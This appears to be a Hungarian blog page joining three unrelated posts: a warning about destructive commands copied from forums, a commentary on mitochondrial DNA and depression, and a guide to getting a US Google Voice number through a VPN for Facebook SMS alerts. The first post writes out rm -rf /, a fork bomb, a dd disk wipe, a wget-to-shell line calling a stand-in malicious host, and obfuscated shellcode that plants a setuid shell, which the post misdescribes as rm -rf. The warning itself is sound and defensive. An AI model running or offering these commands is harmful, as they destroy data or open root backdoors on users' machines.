bardóczi ákos @post.r

Amúgy ennek a posztnak a kapcsán, Petinek, na meg Gergelynek.

Ha nem jelenik meg minden kép azonnal, nos, ne legyünk telhetetlenek!

Alapvető játékszabály, hogy a gépen ne hajtsunk végre olyan műveletet, amiről nem tudjuk, hogy mi a hatása. Mégis nagyon sokan nem tartják be, ha megoldást keresnek valamilyen gépükkel kapcsolatos problémára, aztán beleakadnak egy fórumba, amiben benne van a "tuti megoldás".

Ami eléggé világos, hogy ha valaki ráakad egy olyan fórumtopikra, amiben mondjuk az akadozó flash lejátszóval kapcsolatban osztják meg a tapasztalataikat a felhasználók, hiába javasolja valaki a teljesen tapasztalatlan felhasználónak, hogy windowsos rendszer esetén navigáljon el a Computer ablakba, majd a C jelű meghajtó fölött kattintson jobb egérgombbal, majd a helyi menüben válassza a Format... menüpontot, egyrészt a dolog túl átlátszó, másrészt az operációs rendszer alapértelmezés szerint úgysem engedi, harmadrészt pedig ha valaki nagyon nem ért a géphez, annyire hülye azért mégsem lehet, hogy még akkor is formáz, ha egy ablak figyelmezteti, hogy minden adat visszaállíthatatlanul elveszik a művelettel.
Viszont mi a helyzet azokkal a látszólag tapasztalt felhasználóktól származó "jótét" ötletekkel, amik a laikus számára nem azonnal világosak, a gép nem ír ki semmilyen figyelmeztetést és a gépet szinte biztosan használhatatlanná teszik?

Parancssor ["terminálablak"] ugye minden operációs rendszerben van, aminek a használatában nincs otthon az átlag felhasználó, hiszen eleve ritkán van rá szükség, de itt lehet elérni sokszor olyan funkciókat, amiket a grafikus felhasználói felületen egyáltalán nem, ami pedig a leginkább tündéri benne, hogy nyilván lehet kiadni olyan parancsot, ami a legmagasabb jogosultságok mellett fog lefutni, úgy, hogy semmilyen figyelmeztető üzenetet nem ad.

Például ha valaki azt a szájbarágós ötletet kapja, hogy a Windows 7-ben a Run... menüpont alatt indítsa el a cmd-t, mint a Windows alapértelmezett parancsértelmezőjét, majd írja be a format c: /X /Q parancsot, értelemszerű lenne azt hinnünk, hogy a parancs a C betűjelű meghajtó tartalmát törli, ráadásul gyors módban, a /X pedig arra utasítja, hogy ha valamilyen folyamat használja a meghajtót [nyilván igen, mivel tipikusan innen fut az operációs rendszer], akkor válassza le azt és aztán formázza. A dolog viszont alighanem mégsem fog működni, hiszen alapértelmezés szerint a felhasználó nem rendszergazdaként van belépve, másrészt a Microsoft pont az ilyen veszélyes baromságok kiküszöbölése miatt építette be a Vistától fölfelé mindbe az UAC-megoldást.

Persze a Run as... szolgáltatással a parancs futtatható rendszergazdaként is, a felhasználónak csak-csak feltűnik a figyelmeztetés, hogy a winchestert ledózerolja a kiadott parancs. Formázás helyett persze lehetne particiónálás is, a lényegen nem változtat.

Ami viszont már sokkal gyilkosabb tud lenni - és nem, Sevillai Szent Izidor sem fogja megvédeni a felhasználót - az, ha linux parancsokat ad ki, amit egy fórumban olvasott, de nem tudja, hogy mit csinál. Néhánnyal az Apple fórumokon eléggé sűrűn lehet találkozni, de a trollok gyakran beírják több linuxos fórumba is. Igaz, hogy az OSX-en az operációs rendszer részeként működni képes root felhasználó létezik, de nem aktív, hasonlóan például az Ubuntuhoz, ami biztos, hogy minden unix-like rendszerben a root felhasználó létezik, elvből nem iktatható ki teljesen és a rendszer filozófiájából adódóan amilyen parancsot a parancsértelmező kap tőle, gyakorlatilag feltétel nélkül végre kell hajtania. /*gyakorlatilag persze, hogy vannak részmegoldások, amik ezektől védik a felhasználót, de összességében erre hagyatkozni igen rizikós*/ Másrészt tudvalevő, hogy a laikus felhasználó, ha valamit sürgősen meg akar oldani, akkor mindegy, hogy milyen figyelmeztetés jelenik meg, mindig arra a gombra kattint vagy azt a lehetőséget választja, amivel a leggyorsabban tovább lehet haladni.

A parancshéjakban annak a felhasználónak a nevében indulnak a parancsok, aki indította őket /*child process*/, kivéve, amikor nem: a sudo parancs lehetővé teszi, hogy a parancsvégrehajtás idejére akár a legmagasabb jogosultsági szinttel is elindulhasson egy folyamat. Természetesen linux alatt és almás  rendszernél is kifinomultan szabályozható, hogy ezzel miket lehessen megcsinálni a /etc/sudoers fájl beállításai szerint, az alapértelmezett beállítás viszont érthetően az, hogy abszolút mindent, hiszen pont erre találták ki, azaz csak akkor irkáld át hardening céljából, ha tényleg tudod, hogy mit csinálsz.

Most pedig jöjjön néhány a legveszélyesebb parancsok közül, némi magyarázattal. Alapesetben ugye mind elé csak egy sudo-t kell írni és máris root jogosultságokkal fut,

0x100.

rm -rf /

Már-már klasszikusnak számít, az rm a törlés parancsot jelenti a végén álló slash azt, hogy a rendszergyökértől kezdve mindent, a -rf pedig az a paraméter, ami megmondja, hogy mindez rekurzívan történjen (r) , azaz minden törlődjön, ami él és mozog, ráadásul olyan módon, hogy nem ad semmilyen figyelmeztetést előtte (f).

Ha úgy gondolnátok, hogy ennél szemetebb megoldás már tényleg nincs, csak úgy írom, hogy van. Ugyanis a *sh parancsértelmezőkben egyben C-nyelvű kulcsszavak, sokszor függvények is meghívhatók, ezek pedig ott vannak csőre töltve folyamatosan a memóriában. Az alábbi kódrészlet ugyanazt csinálja, mint az előbb leírt rm -rf / , viszont olyan módon, hogy ha a hülye felhasználó ezt másolja be a terminálablakba, garantáltan nem fogja érteni, hogy mit csinál, mert ún. obfuszkált kódról van szó. /*az obfuscationre nem találtam megfelelő magyar szót, lényeg, hogy egy - tipikusan egyszerű - feladat úgy van megírva, hogy azt esélytelen legyen megérteni hosszasabb elemzés nélkül*/ A kódrészlet valahogy így néz ki:

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “xebx3ex5bx31xc0x50x54x5ax83xecx64x68″
“xffxffxffxffx68xdfxd0xdfxd9x68x8dx99″
“xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7″
“x56x04xf7x56x08xf7x56x0cx83xc4x74x56″
“x8dx73x08x56x53x54x59xb0x0bxcdx80x31″
“xc0x40xebxf9xe8xbdxffxffxffx2fx62x69″
“x6ex2fx73x68x00x2dx63x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Mivel nagyon nem vagyok hardcore C-kóder, én sem jöttem volna rá azonnal, hogy pontosan mit csinál.

0x200.

:(){ :|: & };:

Maga a parancshéj is egy folyamat, így persze többszörözhető. A fent parancs arra utasítja a héjat, hogy többszörözze meg magát, úgy konkrétan végtelen alkalommal. Az eredményt nem nehéz bejósolni: a memória megtelik, a processzor pedig csúcsra jár, a gép garantáltan lefagy, értelemszerűen ha gyors gép, akkor azért, ha lassú, akkor azért.

0x300.

dd if=/dev/random of=/dev/sda

A parancs minden írható felületet véletlenszerű adatokkal fog felülírni, ráadásul olyan módon, hogy nincs az az adatvisszaállító megoldás, amivel a korábbi tartalom helyreállítható lenne. [a windows esetén a formázás, de sokszor a particionálás után is helyreállíthatók az adatok, hacsak nem lettek felülírva, természetesen wines rendszerekben, ha van Powershell, más paranccsal megcsinálható ugyanez]

0x400.

wget http://rosszindulatuoldal.tld/troll_szkriptje -O – | sh

A wget le fog tölteni egy adott webhelyről egy szkriptet, amiben bármi lehet és ezt azonnal át is adja a parancsértelmezőnek, ami persze nem csak sh lehet, hanem másmilyen is. A pompás az egészben, hogy ez az egész szintén a legmagasabb jogosultságokkal fog lefutni, aztán jó esetben nem füstöl el a gépben lévő processzor, hiszen ún. alacsony-szintű hívásokkal lazán írható olyan szript, ami a processzor órajel-többszörözését [GHz] átállítja olyan értékre, amire nagyon nem szabadna. Az alacsony-szintű hívásokhoz nem nagyon értek, de lényeg, hogy olyat is csinálhat egy szkript, ami után azon a gépen már nem sok telepítő fog futkosni és garanciavesztéssel is jár.

Tanulság: ne hajtsatok végre olyan műveletet, pláne ne adjatok ki olyan parancsot a gépen, amiről nem tudjátok pontosan, hogy mit csinál. Akkor sem, ha valaki a szeplőtelen szűzanyára esküszik, hogy az a megoldás vagy egy fórumban találjátok.

Mielőtt valaki úgy gondolná, hogy a méregdrága nagyszámítógépes rendszerek az ilyenektől nyilván mind védve vannak, ezzel kapcsolatban nyilván nem mondhatok sokat, de amit biztosan, hogy ne legyenek illúzióink.

Megjegyzés az első gyilkos szkripttel kapcsolatban: C-forráskódban ne lepődjünk meg semmin, a lenti forráskód lefordítva egy karácsonyi gyerekverset ír ki, az obfuscation klasszikusának mondható, de van még pár ilyen. Eléggé beteg dolog, de több olyan verseny is van, aminek az a célja, hogy a vicces kedvű fanatikusok minél áttekinthetetlenebb kódot írjanak, általában C-ben, de a Perl-es sem piti általában, annyira, hogy egyiket-másikat én sem értem meg gyorsan.

#include <stdio.h>
main(t,_,a)char *a;{return!0<t?t<3?main(-79,-13,a+main(-87,1-_,
main(-86,0,a+1)+a)):1,t<_?main(t+1,_,a):3,main(-94,-27+t,a)&&t==2?_<13?
main(2,_+1,"%s %d %dn"):9:16:t<0?t<-72?main(_,t,
"@n'+,#'/*{}w+/w#cdnr/+,{}r/*de}+,/*{*+,/w{%+,/w#q#n+,/#{l+,/n{n+,/+#
n+,/#;#q#n+,/+k#;*+,/'r :'d*'3,}{w+K w'K:'+}e#';dq#'l
q#'+d'K#!/+k#;q#'r}eKK#}w'r}eKK{nl]'/#;#q#n'){)#}w'){){nl]'/+#n';d}rw
' i;# ){nl]!/n{n#'; r{#w'r nc{nl]'/#{l,+'K {rw' iK{;[{nl]'/w#q#n'wk
nw' iwk{KK{nl]!/w{%'l##w#' i; :{nl]'/*{q#'ld;r'}{nlwb!/*de}'c
;;{nl'-{}rw]'/+,}##'*}#nc,',#nw]'/+kd'+e}+;#'rdq#w! nr'/ ') }+}{rl#'{
n' ')# }'+}##(!!/")
:t<-50?_==*a?putchar(31[a]):main(-65,_,a+1):main((*a=='/')+t,_,a+1)
  :0<t?main(2,2,"%s"):*a=='/'||main(0,main(-61,*a,
"!ek;dc i@bK'(q)-[w]*%n+r3#l,{}:nuwloca-O;m .vpbks,fxntdCeghiry"),
a+1);}

Persze sokféleképp gallyra lehet még vágni egy rendszert, a pontosság kedvéért a fenti parancsokat a http://www.howtogeek.com/125157/8-deadly-commands-you-should-never-run-on-linux/ cikk alapján ellenőriztem, egyébként admin berkekben nem számítanak újdonságnak.
Képek forrása: bitsocialmedia.com, butac.it, hitdojo.com

Vagy ott leszek vagy sem, de tippelni addig lehet!

Úgy fest, hogy nem kamu: egereken végzett kísérletek alapján azt állapított meg, hogy a sejtekben lévő ún. mitokondriális DNS-re korábban nem ismert módon hatással van a környezet, ami a teljes szervezetet éri. A mitokondrium az a sejtszervecske, ami többek közt a a sejtek energiatermeléséért felelős és saját, sejtmagi DNS-től független DNS-lánccal rendelkezik. A mitokondriális DNS elváltozását depressziós betegekben vették észre egy 11 ezer főből álló mintán, ezzel csengett egybe az egereken végzett kísérlet, ha minden igaz.

Az IFLscience cikke szerint az egész szervezetet érintő stresszhatás alatt mitokondriális DNS-ből több jön létre, míg a (sejtmagi) DNS ún. telomer régiója intenzívebben rövidül, ami azért elgondolkodtató, mert ennek a régiónak kulcs szerepe van abban, hogy egy sejt mennyi alkalommal osztódhat illetve stabilizálja a kromoszómavégeket.

Amit fontos megjegyezni, hogy a IFLscience április végi cikke az Oxfordi Egyetem Wellcome Trust Centre for Human Genetics kutatóira hivatkozik, a cikk viszont hivatalosan a Current Biologyban csak május 4-én jelent meg Molecular Signatures of Major Depression címmel, teljes terjedelmében itt olvasható.

Maga a cikk még nekem is eléggé kackiás, könnyen lehet, hogy az ok-okozati összefüggés nem úgy néz ki, ahogyan azt a kutatók láttatni szeretnék, amiben biztos vagyok, hogy különböző környezeti viszonyok közt nagyon sok változás történik a sejtek szintjén, amik közül megtévesztő néhányat kiemelni.

Eleve a mitokondrium genomja egy igencsak különös állatfaj, emlékeim szerint emberben mindössze 30-40 gént kódol, leginkább a baktériumok genomjához hasonló és sokkal nagyobb sansszal éri sérülés, mint a sejtmagi genomot olyan módon, hogy a keletkezett hibát semmilyen mechanizmus nem javítja ki. Ezen kívül a genetikai kódja eltér a természetben megszokott genetikai kódtól. Itt megjegyzem, hogy a genetikai kód fogalmát a mainstream sajtó nagyon gyakran keveri a DNS-szekvencia fogalmával, de még a géntérkép fogalmával is.

Mindenesetre a mitokondriális DNS és a környezet egymásra hatása azért is érdemel figyelmet, mert annak ellenére, hogy igen kevés gént kódol, több betegséggel kapcsolatban is igazolódott korábban, hogy az a mitokondriális DNS mutációjára vezethető vissza.

Ami a kutatásban megfigyelt elváltozásokat illeti, alighanem inkább a változó környezetben megjelenő más fehérjék, ilyen módon a teljes sejt stabilitását szavatoló stresszfehérjék felé lenne érdemes tapogatózni.

A DNS repair folyamatát általánosságban valahogy így kell elképzelni:

kép innen: http://www.dddmag.com/news/2014/06/researchers-discover-enzymes-role-dna-repair

SMS-értesítések facebookos történésekről? Gyakorlatilag bármilyen aktivitásról? Vagy akár a Google-szolgáltatások használata közben is jelenjen meg egy kis buborék, ami értesít, ha valami történik a Facebookodon? Nem tűnik túl értelmes dolognak, bizonyos esetekben hasznos lehet. Például, ha munkahelyen a FB tiltva van, de a Google-szolgáltatások nem.

Először is leszögezném, hogy én Google-szolgáltatásokat saját célra elvből csak annyira használok, amennyire nagyon kell, másrészt szintén elvből számomra a Facebook csak az asztali gépen létezik, egészen kivételes esetben lépek fel rá a mobilom böngészőjén keresztül, ha valahol esetleg várakoznom kell, egyébként például a Messengert sem telepítettem, tőlem aztán történhet bármi, nem hagyom, hogy a "Kéktakony" nyomkodjon engem. Ez természetesen nem jelenti azt, hogy ne kellene ismernem behatóan ezeket a szolgáltatásokat, viszont ennek az elterjedtségükön - ilyen módon megkerülhetetlenségükön - kívül semmi más oka nincs, akár hagyományos használatról, akár kutatásról vagy fejlesztgetésről van szó.

Távol álljak tőle, hogy most azokat a felhasználókat kezdjem el ekézni, akik akár még társaságban is képesek ezerrel nyomkodni a Facebookot, véleményem persze van, de ez a poszt nem erről szól. Másrészt az a felvetés, hogy SMS-ben értesüljünk mindenről, már csak azért is bizarrnak tűnik első látásra, mert az okosmobilok úgyis tudnak push-üzeneteket fogadni, az erre épülő instant üzenetküldők pedig lassan kiszorítják a jó öreg SMS-t. Mégsem mindegy, hogy valaminek az SMS értesítései elérhetőek-e ingyenesen.

Végülis már ezer éves, nem valamilyen kiegészítőhöz, hanem a Facebook core részéhez tartozó feature, hogy amilyen szolgáltatókkal megállapodást kötött a Facebook, azoknak a szolgáltatóknak az ügyfelei akár egy ezer éves mobilon is SMS-ben értesülhetnek testreszabottan olyan FB-aktivitásokról, amik fontosak lehetnek számukra, de akár mindről is. így például ha valaki egy osztrák A1-es SIM-kártyával használja a mobilját, gyakorlatilag bárhol értesülhet egy új üzenetről SMS-ben vagy egy fontos ismerős új posztjáról anélkül, hogy az adatforgalmat jelentene számára. Bizonyos országokban több ilyen szolgáltató is van, míg például Magyarországon máig egy sem.

Ha például a munkahelyen a Facebook tiltva van, ésszerű összedrótozni valamivel, amivel mégiscsak használható több-kevesebb funkcionalitással, viszont ahogy erről korábban írtam, a dolog veszélyes üzem, hacsak nem egy jól ismert szolgáltatásról van szó, mint például a Skype, amivel korlátozottan, de lehet Facebookozni, ha össze vannak drótozva a fiókok. Az is előfordulhat, hogy nincs tiltva, de valami miatt nem szeretnél új ablakot nyitni vagy célzottan csak bizonyos történésekről értesülni, arról viszont azonnal, viszont nincs nálad olyan külföldi SIM-kártya, aminek a szolgáltatójával a fent leírt módon megállapodott volna a Facebook. A mindig elérhető alternatíva az, hogy a Facebook egyszerűen küldjön ezekről email kivonatot, ami viszont pörgősebb és sokkal dinamikusabb, az az SMS-ben/Gootle Voiceban/Hangoutban rejlő lehetőség.

Itt meg kell jegyeznem, hogy amit leírok, annak az alkalmazása formálisan nem teljesen legális, mivel például a Google a voIP-hívószámot eleve csak az USA állampolgárainak biztosítja. Tehát a funkció eléréséhez vagy kint kell lenni az USA-ban vagy el kell hitetni a Google-lel, hogy ott vagy, azt pedig többek közt az IP-címhez tartozó földrajzi hely alapján dönti el.

Ha el kell hitetni valamilyen szolgáltatással, hogy adott országban vagy, virtuális magánhálózat [VPN] használata kézenfekvő, a VPN szolgáltatók közt pedig a fizetősök mellett vannak ingyenesek is, mint például amit a VPNbook ajánl, de az ingyenesek használata tartósan nem ajánlott, nem csak azért, mert rémesen lassúak. Nem büntetnék senkit azzal, hogy különböző operációs rendszerekben egy-egy VPN-hálózatra hogyan kell csatlakozni, lényeg, hogy a beállítás fél percnél általában nem tart hosszabb ideig. A teljes folyamathoz pedig természetesen használjunk szűz böngészőt vagy használjuk a "pornó módot", azaz privát böngészést, lényeg, hogy a megtévesztendő szolgáltatás az általa korábban elhelyezett webhelyadatokhoz, sütikhez ne férjen hozzá.

Miután csatlakoztunk egy USA-beli VPN-re, első lépésben a Google-fiókba való bejelentkezés után ugorjunk el a http://google.com/voice oldalra. Ezen a fülön teljesen más jelenik meg az USA-ban és az USA-n kívüli területeken. A beállítás után viszont a saját fiókodban már Európából is elérhető lesz az, amit beállítottál. Ekkor jön az USA-beli telefonszám létrehozása [nem saját mobilszám használata!], amivel kapcsolatban nem nagyon van megkötés, viszont pofás dolognak tűnik a saját magyar mobilszámodat beírni a keresőbe, ekkor a Google keres egy olyan számmezőt, ahol az adott szám még szabad és ha talált, felajánlja regisztrációra, teljesen ingyenesen. Azaz ha mondjuk a magyar mobilszámod 70 1124545, akkor kihasználva azt, hogy az USA egy körzetén belül a telefonszámok szintén hét számjegyűek, érdemes a 1124545-ra rákeresni, így a Google-számod mondjuk +1 555 1124545 lesz, ami az ismerősök számára ismerősebb, könnyebben megjegyezhető.

A telszám létrehozása tehát értelemszerű, a Google-fiókodhoz fog tartozni:

Ezt követően gyakorlatilag azonnal lehet SMS-eket fogadni, a hívások fogadásához érdemes telepíteni a Google Voice böngésző plugint, de ezt a Google úgyis felajánlja. Ha zavaros lenne, hogy melyik a Google Voice, Google Talk, Google Hangout, mindenkit megnyugtathatok, hogy ennek végfelhasználói szempontból most semmi jelentősége.

Miután a telefonszám létrejött, finomhangolható az ún. portolással, hogy az SMS-ek az adott felületen kívül melyik email-címre érkezzenek, a hanghívások át legyenek-e irányítva, ezen kívül finomhangolható a hangposta, de alapvetően csak az olyan szolgáltatásokért kell fizetni, amik átirányítással járnak, mivel az egyszerűsítve olyan, mintha az előfizető hívást indítana illetve fizetős az SMS-küldés az USA-ban a legtöbb hálózat felé, ezen kívül az ún. végződtetési szolgáltató is számít, ami ebben az esetben ingyenes lesz. A beállítás végén a böngészőben valami ilyesmi látható:

Amint ez megvan, a Facebookba való bejelentkezés után a fiókhoz adjuk hozzá a frissen sült számot, a Mobile menüpont alatt, országként az USA-t, szolgáltatóként a Google Voice-t választva

Ezt követően egy megerősítésre van szükség a Facebook által SMS-ben kiküldött azonosító megadásával.

Miután ez megvolt, a Facebook-fiók a virtuális mobilszámmal össze is lett kapcsolva. Fontos megkülönböztetni azt, amikor a Facebook egyszerűen csak tudja a mobilszámunkat és arra különösen indokolt esetekben tud értesítést küldeni, kétlépcsős azonosításhoz használod vagy éppenséggel arról van szó, hogy a FB úgy van beállítva, hogy maguk a standard értesítések is menjenek SMS-ben [mobilhálózatok közt ebben mutatkozik meg a különbség, ahogy fentebb írtam].

Ha minden jól ment, a dolog valahogy így fog kinézni a Mobile mezőben:

Azt pedig, hogy milyen esetekben zargasson SMS-ben a Facebook, már a Notifications-nél kell beállítani:

Az, hogy miről és milyen gyakorisággal érkezzen értesítő, ahhoz idomul, amiről egyébként is értesítene a Facebook, azaz ha például úgy van beállítva, hogy azoknak az ismerőseidnek a posztjairól értesítést kérsz, akik ott vannak a Close friends listában, szinte az összes aktivitásuk SMS-ben záporozik majd be. Amit megjegyzek, hogy a Facebooknak van annyi esze, hogy hiába van beállítva például az email kivonatok küldése bármivel kapcsolatban, ha be vagy jelentkezve, bizonyos eseményekről értelemszerűen nem jön kivonat. Azaz például nekem az összes üzenetem megérkezik emailen is, de ha pont be vagyok lépve, amikor valaki üzenetet küld és azt el is olvasom, arról már nem fog értesítő jönni. Az SMS-ekkel teljesen hasonló a helyzet, ezt a teszteléskor figyelembe kell venni! Ami az értesítések testreszabását illeti, érthetően erre nincs általános recept.

Készen is van! A gépet le is lehet választani a VPN-ről minden más már menni fog hagyományos netkapcsolaton keresztül. A Google-ben megjelenő FB-értesítések egyrészt megjelennek nyilván, ha a Gmail/Hangouts/ szolgáltatást éppen használod a böngészőben, akkor is, ha éppen nem használod, viszont nem jelentkeztél ki és az értesítések a böngészőprogram számára engedélyezettek [ekkor buborékok formájában], ezen kívül természetesen mobilra és asztali gépre is telepíthető a Google csevegője.

Az értesítések potyognak is be a postafiókba és ha például valaki üzenetet küldött, emlékeim szerint tudsz is neki válaszolni onnan, mivel az üzenetek azonosítója egy-egy nyolc számjegyű, USA-beli rövid hívószám, így az USA-beli számodról válaszolva a Facebook e kettő alapján tudni fogja, hogy az üzenetet kinek kell továbbítani, emlékeim szerint ez is ingyenes, valahogy így kell elképzelni webes felületen:

Amit megjegyeznék, hogy a leírt lehetőségeket kipróbáltam azért, hogy legyenek ábrák ehhez a poszthoz, viszont nem használom sem a Gmail-címem, sem a Google-számom, sem a Google Hangouts-ot és magát a Facebook SMS-értesítőt sem. Előfordulhat, hogy valami nem pontosan ugyanúgy működik a beállítás folyamatában másnál is, a beállítás nem egy rocket science, nem mentem bele minden részletbe.

Amit viszont nagyon fontos tudnod, mielőtt belecsapsz: sem a Facebook, sem pedig a Google nem hülye olyan értelemben, hogy ha azt tapasztalja, hogy 12:30-kor még Hejőszalontáról használtad a szolgáltatást, 12:35-kor pedig kapásból helyes felhasználói név és jelszó megadásával bejelentkezel VPN-en mondjuk Washington D.C-ből, és korábban ilyet még nem csináltál, akkor a Google és a Facebook szintén annak megfelelően fog eljárni, mintha a jelszavad esetleg ellopták volna. Érthető, hiszen életszerűtlen 5 perc alatt a világ másik végéről belépni. Ezért mindkettő rákérdezhet olyan adatokra, mint a másodlagos email-címed, a születési időd és hasonló olyan adatok, amikről feltételezi, hogy csak Te tudhatsz, ezeket mindkét szolgáltatásban előzetesen ellenőrizd. Ami igencsak komfortos, ha mindkét helyen korábban már adtál meg megerősített, azaz igazolt, mondjuk magyar mobilszámot, mivel egy kérdéses belépésnél egy arra érkező megerősítő SMS-ben lévő azonosítóval azonnal tudod igazolni magad a szolgáltatás előtt. Hozzáteszem, ha azt látja, hogy össze-vissza ugrálsz a vakvilágba VPN-en, webes proxyn, TOR-on keresztül vagy bármi olyan megoldással, ami ellehetetleníti, hogy a szolgáltatás azonosítsa a tényleges földrajzi pozíciód, néhány belépés után már egyáltalán nem picsog, úgy is mondhatnánk, hogy megtanulta.

Itt már egyszer megkaptam, ezért inkább írom, mielőtt valaki bekommentelné, hogy "itt a tavasz, inkább menjetek a friss levegőre, miért kell ennyit foglalkozni a FB-kal", egyrészt ahogy az a posztból is kiderül, itt egy elvi lehetőséget vázoltam fel, másrészt ahogy a korábbi posztokból is kiolvasható, a webes óriások azért nem kerülhetők meg a mindennapjainkban, mert olyan jók lennének, hanem azért, mert olyan információforrásként működnek, legyen szó akár a személyes kapcsolatokkal összefüggésben lévő információkról, akár szakmai információkról, amiket máshonnan ésszerű idő alatt nem lehet összekukázni. Viszont feltételezem, hogy a felhasználó nem közösségi web-heroinista középsúlyos Facebook-addikt, az elvi lehetőség adott, az már a felhasználó dolga, hogy normálisan, ésszerűen használja.

Tessenek szépen lenyugodni, hamarosan írok a Medium.com-ról, a Quibb-ről, Prismaticról és hasonló szolgáltatásokról is.